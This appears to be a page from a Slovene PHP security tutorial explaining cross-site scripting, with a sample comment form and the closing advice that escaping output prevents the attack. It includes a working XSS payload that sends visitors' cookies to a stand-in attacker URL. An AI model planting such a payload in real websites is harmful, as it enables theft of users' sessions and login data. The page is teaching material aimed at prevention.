|
|
| Povezave |
|---|
|
Spletne strani Ključne besede Mali oglasi Mizarstvo Kuhinje Reumofan Reumofan plus |
Domov 
6. VARNOST 6.3 Varnost spletnega mesta 6.3.2 Skripti med spletnimi mesti (ang. XSS-cross site scripting)
6. VARNOST 6.3 Varnost spletnega mesta 6.3.2 Skripti med spletnimi mesti (ang. XSS-cross site scripting) | 6.3.2 Skripti med spletnimi mesti (ang. XSS-cross site scripting) |
|
|
|
XSS je eden najbolj pogostih in najbolj poznanih napadov. Enostavnost tega napada in veliko število ranljivih aplikacij ga naredijo zelo privlačnega za škodljive uporabnike. XSS napad izkorišča uporabnikovo zaupanje v aplikacijo in je običajno namenjena kraji uporabnikovih informacij, kot so piškotki in drugi osebni istovetni podatki. Vse aplikacije, ki prikazujejo vnos, so na udaru. Naprimer, da imamo obrazec na enem od skupnostnih spletnih mest, ki omogoča uporabniku dodajanje komentarja k profilu drugega uporabnika. Po pošiljanju komentarja stran prikaže vse prejšnje komentarje, tako da si lahko kdorkoli ogleda vse komentarje na strani. <form method="POST" action="izvedi.php"> <p>Dodaj komentar:</p> <p><textarea name="komentar"></textarea></p> <p><input type="submit" /></p> </form> Škodljiv uporabnik lahko pošlje naslednji komentar: <script> document.location = ’’http://primer.si/dobi_piskotke.php?piskotki=’’ + document.cookie; </script> Tako bo vsak naslednji uporabnik, ki si bo ogledoval komentarje, preusmerjen na dani URL in njegovi piškotki (vključno s prijavnimi podatki) bodo pripeti poizvedbenemu nizu. Napadalec lahko z lahkoto dostopa do piškotkov z $_GET[’piskotki’] in jih shrani za kasnejšo uporabo. Ta tip napada je možno preprečiti s pravilnim ubežanjem izhoda. |
|
|
© 2007-2008 PHP, MySQL, XML, OOP, varnost